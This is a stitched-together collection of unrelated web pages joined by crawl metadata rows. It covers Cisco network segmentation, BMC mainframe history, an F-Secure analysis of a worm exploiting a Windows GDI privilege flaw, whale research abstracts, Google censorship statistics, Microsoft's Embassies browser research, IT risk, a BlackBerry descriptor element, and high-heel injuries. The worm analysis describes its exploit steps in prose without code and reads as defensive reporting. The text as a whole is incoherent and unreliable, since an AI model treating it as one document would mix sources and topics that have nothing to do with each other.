If a connection request comes from the subnet assigned for VPN users, we know the user is located outside the corporate network (perhaps in their home). Based on authentication credentials, the user is placed into the sales container. Finally, a profiler helps identify the type of device and places it into the iPad segment. Now that we have all the information for this request, behavioral analytics applies the access model for an authorization action and isolates the connection.
Figure 6: Segmentation Policy Based on Context
The beauty of this framework is that it can help you compartmentalize any object. Whether you have applications hosting data in the cloud, hosts containing data in a data center, or applications with access to data residing both in the cloud and the private data center, the framework provides you the tools to build object-specific zones, create connection context, and apply an access-control model dynamically.
Having a strategy for segmentation in the enterprise is fundamental to ensuring the success of the implementation. When designing for segmentation, most network architects or engineers focus on the larger network zones: DMZ, Core, Datacenter, WAN, Campus, and so on. While this is a good first step, it is not nearly enough to tackle today’s security threats. Most opportunistic attackers take advantage of the fact that there is limited segregation, allowing them to roam around the network unfettered.
A framework is only useful if there is an implementation strategy around it. The strategy should be comprehensive enough to provide all the tools that an enterprise needs to protect its jewels. This paper illustrates a segmentation strategy lifecycle that begins by identifying existing resources and onboarding any new asset or resource. Each of the steps are discussed in more detail in the following sub-sections.
Figure 7: Segmentation Strategy Steps
Identification: As mentioned earlier, segmentation should be based on the value of a critical business asset or resource, not simply on network boundaries. The first move of an attacker is reconnaissance. That is essentially what the first step of the segmentation strategy should be: identifying resources (both data and assets).
To protect (or compromise) a network, it is important to gather intelligence about the various weaknesses that may exist on the network. These weaknesses are exploited by attackers to encroach on other resources to the point where the attackers have privileged access to all critical resources. This makes any type of resource, even one that is considered to have low value, extremely valuable if it is used as the entry point into the network and leads to a more valuable target. The questions to ask are:
- What is the impact to a resource if compromised?
- What is the likelihood of a resource being compromised?
These assets, or objects, are primarily digital in nature and can include, but are not limited to:
- Hardware: servers, network devices, workstations, handheld devices, IP phones, physical security components, connected peripherals and accessories such as printers, scanners, IP phones, voice and video collaboration tools
- Software: operating systems, server and client applications, firmware
- Documentation: network diagrams, asset information, product designs, employee information
The value of an asset is not based on the value of its physical hardware but rather on the value of the data it contains. If an iPad containing private information about your employees is stolen, the total value of the loss is not merely the cost of replacing a $500 iPad.
Classification: The result of this exercise is a comprehensive view of the resources on the network along with their risk classification and rating. Organizations should understand how various resources relate to each other, and not treat them individually. A low-value target may ultimately provide access to a very high-value target, so the entire chain should be protected with ample controls. Depending on the size of the organization, this could be one of the most time-consuming steps. Various methodologies and/or frameworks can be followed to perform a thorough assessment of the resources that exist in the network .
You should now be able to move on to the next steps of creating a segmentation policy that uses the value of each asset to determine how it should be protected. For example, if user workstations are treated as a low-value target but are used to compromise a system that is of high value, such as an employee database, the workstations should also be segmented depending on the resources they are accessing.
Policy Creation: Most cybersecurity programs do not explicitly call for a segmentation policy. It is usually mentioned indirectly in various topics within the program, which unfortunately does not place sufficient importance or value on it. For example, an access-control policy may call out how an HR employee should not be able to access Finance systems. This can be done simply through an access-control list on a firewall along with VLANs, which may protect the resource, but does not necessarily focus on segmentation itself.
A segmentation policy should be built based on data gathered about the resources in the previous steps. This policy should start at a high level, which segregates the various zones through traditional network boundaries, such as DMZ, Datacenter, and Campus, then gradually drills into each zone. This process should continue all the way to the application itself, essentially moving up the layers of the OSI model. Once all objects (and even sub-objects) have been discovered, the policy should be developed based on the type and location of those objects and on the users who are requesting access to various resources hosting or containing data. How deep one goes depends on the criticality of the asset, since in certain cases the cost associated with going through the entire process for a certain asset may not be justified.
Figure 8: Drilling into Zones
Consider two assets: the first, a server that holds credit card information and the second an SMTP server used by a development team for internal testing. Compromise of either asset would result in some loss; however, one is a lot more valuable than the other. Losing customer credit card data can result in huge damages, both monetary and legal, to the organization. This requires an organization to allocate ample resources to ensure that such an asset is well protected.
Once a segmentation policy has been created, it is time to implement these controls through various access-control models.
Access-Control Modeling: There are multiple access-control models to choose from . Which model is used depends on the scenario.
Network engineers are most familiar with network-based ACLs, and while they are a good way to control access between the larger zones, it is difficult to make them granular, especially since they are mostly static and become difficult to manage over time. The model we adopt is a hybrid of multiple models, one which does not rely entirely on OSI Layer 3 and Layer 4 but also takes into consideration multiple access-control models. This includes, but is not limited to:
- Attribute Based Access Control (ABAC)
- Role Based Access Control (RBAC)
- Identity Based Access Control (IBAC)
- Rules Based Access Control (RuBAC)
An example of an access-control model is provided in Table 3.
|HR User on corporate Windows workstation||User group: HR endpoint profile: Windows device auth: Successful||HR||Access to HR systems and web proxy|
|HP printer||Endpoint profile: HP printer device auth: Successful||Printer||Access from print server only|
One solution that enables you to implement the described model is Cisco TrustSec.
Execution: Once an access-control model has been defined and the appropriate policies have been mapped in this model, the next step is to implement these controls. This involves thorough planning, which will lead to the procurement, design, and implementation of the relevant technologies. This can be broken down into the following phases:
Figure 9: Execution Phases
Plan and Procure: This phase of execution entails coming up with a list of requirements to satisfy the goals of the segmentation strategy. Once you have an accurate understanding of what to protect and what to protect against, the next step is to determine what tools, techniques, and procedures are required to provide this protection. What is important is to not start by implementing a segmentation strategy across the entire organization. This leads to high costs and requires a large pool of resources. Based on your data/resource classification and the access-control model, build an implementation plan by prioritizing parts of your organization that handle and store business-critical data. You will not have a fully segmented infrastructure overnight. It is a journey that could take months or in some cases years. The right strategy from day one will guarantee success in the most cost-effective way.
The entire execution needs to be carried out through proper program management. Multiple teams will need management: IT, Procurement, HR, Finance, and Legal, with a fair bit of cross dialogue to guarantee smooth progress.
Once the requirements are clear, the organization may float an RFP (directly or indirectly through a partner), and based on responses evaluate which technologies are best suited to implement the controls required for segmentation. It is highly recommended that those technologies be validated through pilots or proof of concepts to ensure that they satisfy the requirements and pass the various smoke tests. Missing out on a key feature may cause unwanted delays and in some cases a workaround or compromise that may lead to security issues at a later stage.
Design: In most cases, the organization’s lead architect or an external consultant will oversee the design created by the product vendors. The design, when it comes to segmentation, should focus on the core elements, including:
- Location: Where in the network is the resource, and how is it segmented from the rest of the network?
- Device and Application: Does the resource need access to other resources? And do other resources need access to it? For example, a multi-tier application may have a front-end (web), middleware, or back-end (database). Is each service running in its own container and what are the privileges that each service has for the others? What is the relationship between the services?
- User: User devices in normal circumstances do not need to communicate directly with each other. How is this being handled? What can the users access? How does the organization certify that a user’s endpoint has the same level of access regardless of the location?
The design is based on the vendor testing conducted in their own environment to ensure all features and functionality promised during the initial planning and procurement phase work as expected. If there are multiple vendors involved and integration is required among all vendors, testing should be required during the implementation phase conducted on the organization’s staging network.
During this phase, or earlier, it is important to identify the pilot setup, which will involve getting multiple stakeholders and staff involved. The purpose of the pilot is to test all features with the resources (people, processes, techniques, and technologies) so any challenges and issues are resolved before the rollout to the full enterprise.
Once the design is complete, it is time to start the implementation. At this point, any hardware or software should have been delivered. In the case of hardware, it should be racked, stacked, connected and powered up, with any preliminary POST tests to ensure that it is booting up correctly.
Implement and Test: The implementation phase assumes that all the hardware has been tested and is working as expected. Any components that may have failed during the POST tests should have been replaced and be ready for configuration. The implementation should follow a plan that is created based on the design. This includes the detailed configuration that the vendors have already tested and verified in their environments during the design phase.
It is essential to carry out testing to ensure that all is working according to the specifications and expectations for the solution. Testing should follow a proper methodology and should assess both functionality and features that are then recorded. Any issues encountered during testing should be addressed with the vendors and rectified before moving into the implementation phase.
As mentioned earlier, the pilot is important to this phase and should be conducted once functional and feature tests are completed. The pilot tests for performance, resiliency, user experience, and interoperability, and addresses any issues that may have been overlooked during the initial phases. The pilot phase should also span across locations, departments, technologies, and resources. This reach ensures that all stakeholders are involved in the process and will work towards a proper resolution of any challenges faced.
Monitoring: This step is one that is given very little importance in most enterprises. Monitoring is key to safeguarding the network from intruders and ensuring that systems and networks are performing as per specifications. Monitoring marks the culmination of the whole segmentation strategy and is the glue that brings people, processes, and technologies together to preserve the integrity of the protected resources. Keeping a close eye on the network not only eases detection of any anomalous activity but also helps identify any resources, new or existing, that may have been missed during the initial pass. This will determine whether another iteration through the whole segmentation lifecycle is required.
By 2020, the number of connected devices is expected to grow exponentially to 50 billion. As more devices connect to the digital world, segmenting an organization's infrastructure based on network elements will not be enough. Organizations are experiencing increased threats against their sensitive resources, which often results in a data breach. By using a framework that allows organizations to deconstruct all elements of a session request, inspect appropriate objects, and apply an access-control model to ensure that data is accessed by an authorized session (by a user, device, process, or application), organizations can help protect against these breaches. The framework provides senior management and network architects with a blueprint to ensure that segmentation is an indispensable part of the overall security strategy. The framework also offers a segmentation implementation strategy that provides all the means and tools to ensure that an organization's critical resources and data are well-protected.
Jazib Frahim (firstname.lastname@example.org)
Aun Raza (email@example.com)
Choosing the Right Segmentation Approach
An Introduction to Information System Risk Management
Managing Information Security Risk
TOGAF Version 9.1
Access control - Access control models from Wikipedia | <urn:uuid:9b53799b-2adb-47da-bb30-7ff746c77ed5> | CC-MAIN-2017-04 | https://www.cisco.com/c/en/us/about/security-center/framework-segmentation.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281424.85/warc/CC-MAIN-20170116095121-00462-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935285 | 6,632 | 2.671875 | 3 |
The mainframe faced two crucial challenges in this time: 1) the cost of mainframe computing power (MIPS) was under pressure from distributed computing; 2) the monolithic application model was being replaced by n-tier client/server computing. Mainframes responded to the former with the introduction of CMOS technology and substantially cheaper MIPS. For the second challenge, the mainframe, with its twenty plus years of development, housed critical business logic and data, and became the key source of the information that end-users wanted to access. Organizations created application structures that resulted in their customers engaging with the mainframe, even though they likely did not recognize they were doing so.
IT attention had to shift to the end user and managing quality of service, and BMC innovations pioneered new systems management techniques along with improvements in their solutions that resulted in even more mainframe availability.
BMC Innovations that Changed Mainframe Management (1990 – 2000)
(Watch this blog in coming weeks for reminiscences about these innovations.)
1999 – MainView Explorer delivered browser- based real-time monitoring of mainframe performance without the need for outboard hardware implementations
1999 – APPLY PLUS for DB2(R) offered an extremely fast STATIC SQL processor as an alternative to free DYNAMIC versions
1998 – Recover Plus for DB2 (Recover Backout) was the first alternative way (using backouts) to recover from DB2 data base errors
1998 – Fast Path Online Reorg & Image Copy provided faster method for reorganizing IMS(R) DEDB data bases while data is still online
1997 – Reorg Plus for DB2 SHLEVEL CHANGE Allowed full update ability to a tablespace during 99% of the REORG process eliminating the need for application outage
1995 – DATA ACCELERATOR Compression compressed data to improve performance of applications using the data
1994 – APPLICATION RESTART CONTROL for DB2 and IMS automatically manage batch job failures and restarts
1993 – XBM (Snapshot Upgrade Facility) was the first product to take advantage of software caching and intelligent hardware to reduce the COPY time and outages
1992 – Change Manager for DB2 automated and simplified schema management for DB2
1992 – ULTRAOPT reduced loading on networks to improve performance without having to add network bandwidth
1991 – Recover PLUS for DB2 offered a faster time to recover from DB2 data base errors
1991 – LoadPlus/UnloadPlus for DB2(R) provided a faster method for loading/unloading DB2 tables
1990 – RECOVERY PLUS for IMS(R) delivered a faster time to recover from IMS data base errors
You can also view a fifty year timeline and more information on our mainframe anniversary page at www.bmc.com/mainframeanniversary
(R) Trademarks or registered trademarks of International Business Machines Corporation in the United States, in other countries, or both. | <urn:uuid:d4701e3d-6142-46fd-a7a4-340a94a9d628> | CC-MAIN-2017-04 | http://www.bmc.com/blogs/50-bmc-mainframe-innovations-system390r-period-1990-2000/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00214-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.90046 | 607 | 2.671875 | 3 |
It's an interesting twist on an old tactic — a worm that uses a local elevation of privilege vulnerability to access the kernel and execute code.
Most malware with rootkit functionality will tamper with the Windows kernel and attempt to execute code in kernel mode. Typically, a special driver is used to do this.
Worm.Win32.AutoRun.nox has a payload that restores the original function pointers back to the kernel's System Service Table (SST). The usual motivation for malware to do this is to remove any SST hooks installed by security software or other malware that might affect its successful operation.
As noted, normally a special driver or the physical memory device is used to get access to kernel-mode memory to restore the pointers. AutoRun.nox is different — it uses "GDI Local Elevation of Privilege Vulnerability (CVE-2006-5758)" to do the job. For malware, its rather unique to see such a technique being used.
This vulnerability is due to an error in handling a shared memory structure, which allows the structure to be remapped from read-only to writable. April 2007's update patched the vulnerability.
After remapping the memory, the malware will initialize a CPalette object. It will then search for the palette object in the shared kernel memory structure. Since the memory is now writable, it can be altered to include a pointer to a special function that will remove any existing SST hooks. Finally, a call to GetNearestPaletteIndex will indirectly cause the function to be executed. Afterwards, the palette object is restored leaving no trace of the attack.
If attacking this vulnerability fails, the worm goes back to the tried-and-true "special driver" method. The driver is detected by us as Rootkit:W32/Agent.UG.
Either way, if the attack is successful, the machine is compromised as the attacker can access the kernel and execute code, or cause a denial of service.
This attack will only work on unpatched machines running without the latest updates. Microsoft ranks this vulnerability as Important and recommends that users apply the update immediately. | <urn:uuid:42ce9852-b40b-4b73-a37d-0a2a71734e09> | CC-MAIN-2017-04 | https://www.f-secure.com/weblog/archives/00001507.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280128.70/warc/CC-MAIN-20170116095120-00518-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.884211 | 437 | 2.59375 | 3 |
Tyack P.L.,Woods Hole Oceanographic Institution |
Zimmer W.M.X.,North Atlantic Treaty Organisation Undersea Research Center |
Moretti D.,Naval Undersea Warfare Center |
Southall B.L.,Southall Environmental Associates |
And 11 more authors.
PLoS ONE | Year: 2011
Beaked whales have mass stranded during some naval sonar exercises, but the cause is unknown. They are difficult to sight but can reliably be detected by listening for echolocation clicks produced during deep foraging dives. Listening for these clicks, we documented Blainville's beaked whales, Mesoplodon densirostris, in a naval underwater range where sonars are in regular use near Andros Island, Bahamas. An array of bottom-mounted hydrophones can detect beaked whales when they click anywhere within the range. We used two complementary methods to investigate behavioral responses of beaked whales to sonar: an opportunistic approach that monitored whale responses to multi-day naval exercises involving tactical mid-frequency sonars, and an experimental approach using playbacks of simulated sonar and control sounds to whales tagged with a device that records sound, movement, and orientation. Here we show that in both exposure conditions beaked whales stopped echolocating during deep foraging dives and moved away. During actual sonar exercises, beaked whales were primarily detected near the periphery of the range, on average 16 km away from the sonar transmissions. Once the exercise stopped, beaked whales gradually filled in the center of the range over 2-3 days. A satellite tagged whale moved outside the range during an exercise, returning over 2-3 days post-exercise. The experimental approach used tags to measure acoustic exposure and behavioral reactions of beaked whales to one controlled exposure each of simulated military sonar, killer whale calls, and band-limited noise. The beaked whales reacted to these three sound playbacks at sound pressure levels below 142 dB re 1 μPa by stopping echolocation followed by unusually long and slow ascents from their foraging dives. The combined results indicate similar disruption of foraging behavior and avoidance by beaked whales in the two different contexts, at exposures well below those used by regulators to define disturbance. Source
Schick R.S.,Duke University |
Halpin P.N.,Duke University |
Read A.J.,Duke University |
Urban D.L.,Duke University |
And 11 more authors.
Marine Ecology Progress Series | Year: 2011
The understanding of a species' niche is fundamental to the concept of ecology, yet relatively little work has been done on niches in pelagic marine mammal communities. Data collection on the distribution and abundance of marine mammals is costly, time consuming and complicated by logistical difficulties. Here we take advantage of a data archive comprising many different datasets on the distribution and abundance of cetaceans from Nova Scotia through the Gulf of Mexico in an effort to uncover community structure at large spatial scales (1000s of km). We constructed a multivariate ordination of the species data, tested for group structure that might exist within the ordination space, and determined how these groups might differ in environmental space. We examined 3 biogeographic regions: the oceanic waters north and south of Cape Hatteras, NC, and the Gulf of Mexico. North of Hatteras, we found 2 main groups split along a temperature and chlorophyll gradient, with most piscivores being found in cooler, more productive waters of the continental shelf, and most teuthivores being found farther offshore in warmer, less productive waters at the shelf break (200 m isobath). South of Hatteras, we found 3 groups, with the largest group being in warmer, lower chlorophyll waters that are closest to shore. In the Gulf of Mexico, we found 7 groups arrayed along a bottom depth gradient. We also tested the effect of taxonomically lumping different beaked whale species on ordination results. Results showed that when beaked whales were identified to the species level, they clustered out into distinct niches that are separate from those of other Odontocete groups. These results add to an increasing understanding of wildlife habitat associations and niche partitionings in the community structure of pelagic species, and provide important baseline information for future population monitoring efforts. © Inter-Research 2011. Source
Deruiter S.L.,University of St. Andrews |
Boyd I.L.,University of St. Andrews |
Claridge D.E.,Bahamas Marine Mammal Research Organisation |
Clark C.W.,Cornell Laboratory of Ornithology |
And 3 more authors.
Marine Mammal Science | Year: 2013
In 2007 and 2008, controlled exposure experiments were performed in the Bahamas to study behavioral responses to simulated mid-frequency active sonar (MFA) by three groups of odontocetes: false killer whales, Pseudorca crassidens; short-finned pilot whales, Globicephala macrorhynchus; and melon-headed whales, Peponocephala electra. An individual in each group was tagged with a Dtag to record acoustic and movement data. During exposures, some individuals produced whistles that seemed similar to the experimental MFA stimulus. Statistical tests were thus applied to investigate whistle-MFA similarity and the relationship between whistle production rate and MFA reception time. For the false killer whale group, overall whistle rate and production rate of the most MFA-like whistles decreased with time since last MFA reception. Despite quite low whistle rates overall by the melon-headed whales, statistical results indicated minor transient silencing after each signal reception. There were no apparent relationships between pilot whale whistle rates and MFA sounds within the exposure period. This variability of responses suggests that changes in whistle production in response to acoustic stimuli depend not only on species and sound source, but also on the social, behavioral, or environmental contexts of exposure. © 2012 by the Society for Marine Mammalogy. Source
Fearnbach H.,University of Aberdeen |
Fearnbach H.,Bahamas Marine Mammal Research Organisation |
Durban J.,Southwest Fisheries Science Center |
Durban J.,Bahamas Marine Mammal Research Organisation |
And 5 more authors.
Ecological Applications | Year: 2012
Identifying demographic changes is important for understanding population dynamics. However, this requires long-term studies of definable populations of distinct individuals, which can be particularly challenging when studying mobile cetaceans in the marine environment. We collected photo-identification data from 19 years (1992-2010) to assess the dynamics of a population of bottlenose dolphins (Tursiops truncatus) restricted to the shallow (<7 m) waters of Little Bahama Bank, northern Bahamas. This population was known to range beyond our study area, so we adopted a Bayesian mixture modeling approach to mark-recapture to identify clusters of individuals that used the area to different extents, and we specifically estimated trends in survival, recruitment, and abundance of a "resident" population with high probabilities of identification. There was a high probability ( p=0.97) of a long-term decrease in the size of this resident population from a maximum of 47 dolphins (95% highest posterior density intervals, HPDI = 29-61) in 1996 to a minimum of just 24 dolphins (95% HPDI = 14-37) in 2009, a decline of 49% (95% HPDI =-5% to -75%). This was driven by low per capita recruitment (average ;0.02) that could not compensate for relatively low apparent survival rates (average ;0.94). Notably, there was a significant increase in apparent mortality (∼5 apparent mortalities vs. ∼2 on average) in 1999 when two intense hurricanes passed over the study area, with a high probability ( p = 0.83) of a drop below the average survival probability (∼0.91 in 1999; ∼0.94, on average). As such, our mark- recapture approach enabled us to make useful inference about local dynamics within an open population of bottlenose dolphins; this should be applicable to other studies challenged by sampling highly mobile individuals with heterogeneous space use. © 2012 by the Ecological Society of America. Source
Dunn C.,Bahamas Marine Mammal Research Organisation |
Claridge D.,Bahamas Marine Mammal Research Organisation
Journal of the Marine Biological Association of the United Kingdom | Year: 2014
Killer whales (Orcinus orca) have a cosmopolitan distribution, yet little is known about populations that inhabit tropical waters. We compiled 34 sightings of killer whales in the Bahamas, recorded from 1913 to 2011. Group sizes were generally small (mean = 4.2, range = 1-12, SD = 2.6). Thirteen sightings were documented with photographs and/or video of sufficient quality to allow individual photo-identification analysis. Of the 45 whales photographed, 14 unique individual killer whales were identified, eight of which were re-sighted between two and nine times. An adult female (Oo6) and a now-adult male (Oo4), were first seen together in 1995, and have been re-sighted together eight times over a 16-yr period. To date, killer whales in the Bahamas have only been observed preying on marine mammals, including Atlantic spotted dolphin (Stenella frontalis), Fraser's dolphin (Lagenodelphis hosei), pygmy sperm whale (Kogia breviceps) and dwarf sperm whale (Kogia sima), all of which are previously unrecorded prey species for Orcinus orca. © 2013 Marine Biological Association of the United Kingdom . Source | <urn:uuid:f661bf05-231a-4ce1-b62a-a80c669b7382> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/bahamas-marine-mammal-research-organisation-120957/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00564-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.902342 | 2,008 | 2.8125 | 3 |
As more and more people around the world rely heavily on the Web as a primary source of information, governments are taking note – and stepping up efforts to censor the Internet. From July to December 2012, Google received 2,285 government requests to remove 24,179 pieces of content—an increase of 26 percent over the 1,811 requests to remove 18,070 pieces of content that we received during the first half of 2012.
Those numbers are part of Google's seventh and most recent transparency report, a commendable effort to tell the world what information governments around the world are requesting or, in this case, trying to delete.
It's not the dictatorships or Islamic governments that are trying the hardest to censor information; it's the democracies. Brazil made the most requests from any country with 697 requests, while the United States took second place, with 321 requests.
According to Google Legal Director Susan Infantino, the Brazilian municipal elections caused the spike in censorship, with half of the total requests alleging violations of that country's electoral code, which forbids defamation against candidates.
Defamation is a very slippery sort of a word, and it's easy enough to use it as an excuse to tamp down legitimate criticisms of public officials. In the U.S., said Infantion, "We received a request from a local government agency to remove a YouTube video that allegedly defamed a school administrator. We did not remove the video.
"We received three separate requests from local law enforcement agencies to remove three YouTube videos that allegedly defamed police officers, public prosecutors or contained information about police investigations. We did not remove the videos."
Since 2010, more than one-third of its content removal requests were over reported defamation, by far the largest category of removal request, the company reported, while pornography, national security and copyright violation accounted for a small fraction of the take-down requests.
Twitter started reporting government takedown requests last year, but Facebook still does not.
The transparency reports also focus on government attempts to grab information on users from Google. In January, Google disclosed that government agencies in the U.S. made a record number of requests for user data in the last half of 2012 -- but only 22 percent were backed up by a warrant. | <urn:uuid:0d209740-6ce6-4f28-b904-e2c82572280b> | CC-MAIN-2017-04 | http://www.cio.com/article/2370518/internet/google-reports-web-censorship-is-escalating.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00040-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958015 | 457 | 2.65625 | 3 |
Microsoft researchers have developed the prototype of a client-side architecture that would replace the Web browser with a much more secure virtualized environment that isolates Web applications.
Called Embassies, the technology would have applications run in low-level, native-code containers that would use Internet addresses for all external communications with applications. The architecture is based on the notion of a "pico-datacenter," a client-side version of a shared server datacenter.
"Since the datacenter model is designed to be robust to malicious tenants, it is never dangerous for the user to click a link and invite a possibly hostile party onto the client," Microsoft researchers said in a paper presented this month at the USENIX Symposium on Networked System Design and Implementation.
The problem Microsoft is trying to solve is the insecurity of today's browsers, brought on by their complexity. In the 1990s, when browsers were introduced, the software was mostly responsible for formatting Web pages that were text, links and simple graphics.
Today's browsers have many more application programming interfaces (APIs) that are used for far more complicated tasks, such as video, animation and 3D graphics. This high level of complexity has brought a never-ending string of vulnerabilities that hackers can exploit.
"I think [Embassies is] an interesting idea and shows enough promise to be worth additional investigation and investment," Jason Taylor, chief technology officer of Security Innovation, said on Friday. "The premise of strong isolation for each Web application versus isolation for the browser itself is intriguing."
Embassies is Microsoft's attempt to present a simpler alternative than the browser. The architecture would provide a simple execution environment that would use only 30 functions in interacting with the client's execution interface (CEI). Displaying content would essentially be a screencast from the container to the user's screen.
The simplicity of the environment would require developers to do more than they do now in building applications for a browser, which provides lots of libraries through the APIs.With Embassies, developers would be responsible for packaging their own libraries with their applications, a difficult process that in effect would hand security responsibilities to the developer. If malicious code gets in, the container would theoretically prevent it from infecting the computer.
That approach has its skeptics. "The problem with the idea is that developers of web applications are often terrible at security and the idea that you are going to make them the ones responsible for the security instead of the web browser developer just seems like out of the frying pan and into the fire," said Peter Bybee, president and chief executive of Security On-Demand. "I think this is more about wishful thinking and less on realistic change."
[BASICS: Software security for developers]
Wolfgang Kandek, chief technology officer of Qualys, said the added responsibilities would likely overwhelm most developers, but he believed that the process of packaging libraries could eventually be automated within development tools.
"It is an architecture that will require lots of changes on the client side and on the developer side, which is probably why this is not something that will happen overnight," Kandek said.
Indeed, the authors of the paper, Microsoft researchers Jon Howell, Bryan Parno and John R. Douceur, acknowledged that Embassies would require dramatic changes in application development and adoption of the architecture would take years.
While Microsoft described the architecture as a browser replacement, the company also believed it could become a more secure alternative to desktop operating system apps. Shlomo Kramer, president and chief executive of Imperva, said Embassies was "promising in theory," but believed it would not scale to that level.
"The main reason is that it makes collaboration, workflows, sharing of data and transacting across virtual machines very cumbersome," Kramer said.
Matthew Neely, director of research at SecureState, said rather than replace today's browsers, security could be dramatically improved just by developers treating it as an integral part of the development process.
"A lot of people like to focus on new technology to fix something when really if you just apply the basics to what we have already, you can usually get more impact," Neely said.
This story, "Microsoft eyes ditching browser for secure Web apps" was originally published by CSO. | <urn:uuid:b0d95b39-3240-49ca-9fe4-d697429d9cfb> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2165341/smb/microsoft-eyes-ditching-browser-for-secure-web-apps.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280929.91/warc/CC-MAIN-20170116095120-00555-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965195 | 874 | 2.578125 | 3 |
What are the Sources of Risks?
According to a Harvard and Gartner “IT risk” research report, “Most IT risks arise not from technical or low-level people issues but from the failure of the enterprise’s oversight and governance processes for IT. Such failures produce a series of poor decisions and badly structured IT assets that are manifested as ineffective IT governance, uncontrolled complexity, and inattention to risk. Many of the risk factors are symptoms of common condition, ineffective implementation of IT governance.”
Risk and Return Relationship
Everyday decisions that managers make commit their organizations to different levels of risk for which they must seek appropriate rewards. Figure 1 (above) reflects the positive correlation between risk and return in four stages:
- The (X) line represents the value over time, and the (Y) represent the investment size.
- When the risk curve is low, and the return curve is at safe investment, this frame is called “low return and low risk,” the expectations from the IT project is “low value.”
- While the risk curve starts to rise to mid-point, the return curve rise proportionally to reach the point of optimum investment, this frame is called “med return and med risk,” the expectations from the IT project is “med value.”
- When the risk reach the high point, the return curve rise proportionally to reach the risky investment, this frame is called “high risk and high reward”, the expectations from the project is “high value.”
- Finally the two curves converse, at this point, the risk factors are two great in some or parts and will destroy the value of the project.
Each accepted project will increase or decrease the overall risk of the organization by quantities that may appear insignificant in the larger context, but aggregate to determine the overall risk of the organization. Holistically, this drives the entire organization up or down the risk and reward curves.
IT needs to Align with the Organization’s Risk Portfolio
Effective implementation of enterprise IT projects requires alignment of IT management decisions with the organization business strategy, and risk governance. Overall, governance achieves three goals: effective use of IT by people, IT decisions properly processed among various IT departments, and tracking and reporting projects in a structure. IT governance, governs what decisions must be made based on the organization appetite to risk, who should make the decisions, this provides checks and balances, and finally, structuring how decisions are made.
Turn Risk into Competitive Advantage
An IT risk incident has the potential to produce substantial business consequences that touch a wide range of stakeholders. Once an organization starts to invest wisely in IT, it will turn IT into competitive-advantage weapon, but equally, it will grow its dependency on IT. As a result, IT becomes part of the organization fabric of business risk; therefore. It’s required that, when IT executives make decisions they need to understand the organization’s risk portfolio and the organization’s appetite to risk. In short, IT risks matters—now more than ever.
Please note the opinions expressed here are those of the author and do not reflect those of his employer.
Industry Perspectives is a content channel at Data Center Knowledge highlighting thought leadership in the data center arena. See our guidelines and submission process for information on participating. View previously published Industry Perspectives in our Knowledge Library.
1 Harvard Business School, Turning Business Threat Into Competitive Advantage 2007.
Pages: 1 2 | <urn:uuid:39b7fb16-b741-48a5-abaf-129754b3488b> | CC-MAIN-2017-04 | http://www.datacenterknowledge.com/archives/2013/03/05/understanding-it-risks/2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281424.85/warc/CC-MAIN-20170116095121-00463-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935619 | 727 | 2.53125 | 3 |
(Optional) The name and value of environment variables
The <env> element specifies the name and value of environment variables. For example, you can use the LD_LIBRARY_PATH environment variable to specify the name of the linker variable used by the OS to find shared libraries required by the application. In addition, you can use custom environment variables where the use of program arguments aren't possible.
For instance, you can set LD_LIBRARY_PATH to a value of app/playbook/native/lib to specify where to find the required binaries.
|value||(Required) Specifies the value for the environment variable, such as app/playbook/native/lib.||A string that uniquely identifies the value within the application descriptor file. The string value must only contain digits, letters, white-spaces, and underscores, and they must begin with a letter or underscore.||None|
|var||(Required) Specifies the name of the environment variable, such as LD_LIBRARY_PATH.||A string that uniquely identifies the variable within the application descriptor file. The string value contains only digits, letters, and underscores, and they must begin with a letter or underscore.||None|
<env var="LD_LIBRARY_PATH" value="app/playbook/native/lib"/> | <urn:uuid:369789cb-2143-443f-b06f-2e2f947a5c2e> | CC-MAIN-2017-04 | http://developer.blackberry.com/playbook/native/documentation/com.qnx.doc.native_sdk.devguide/com.qnx.doc.native_sdk.devguide/topic/r_barfile_dtd_ref_env.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00005-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.697771 | 278 | 2.71875 | 3 |
You ever see a woman walking around on incredibly tall and pointy high heels and say to yourself, "That actually looks dangerous!"
Well, it is. And high heel-related injuries are on the rise.
From HealthDay via CBS News:
U.S. emergency rooms treated 123,355 high-heel-related injuries between 2002 and 2012, say researchers from the University of Alabama at Birmingham. More than 19,000 of those injuries occurred in 2011 alone.
Sprains and strains to the foot and ankle were the most common complaints, and most patients were in their 20s and 30s, the study found.
The study was published last month in the Journal of Foot and Ankle Injuries. From a university press release:
The vast majority of the injuries — more than 80 percent — were to the ankle or foot, with just under 20 percent involving the knee, trunk, shoulder, or head and neck. More than half were strains or sprains, with fractures accounting for 19 percent of all injuries. While white females as a group had the largest number of heel-related injuries, the rate of injury for black females was twice that of whites.
“Our findings also suggest that high-heel-related injuries have increased over time, with the rate of injury nearly doubling from 2002 to 2012,” said lead researcher Gerald McGwin, Ph.D., vice chair and professor of the Department of Epidemiology in the UAB School of Public Health. "We also noted that nearly half the injuries occurred in the home, which really supports the idea of wearing the right footwear for the right occasion and setting. Also, to reduce the time of exposure, we recommend that those wearing heels be aware of how often and for how long they wear them.”
Is it just us, or is it sort of strange that women wear high heels so frequently at home? We don't get that.
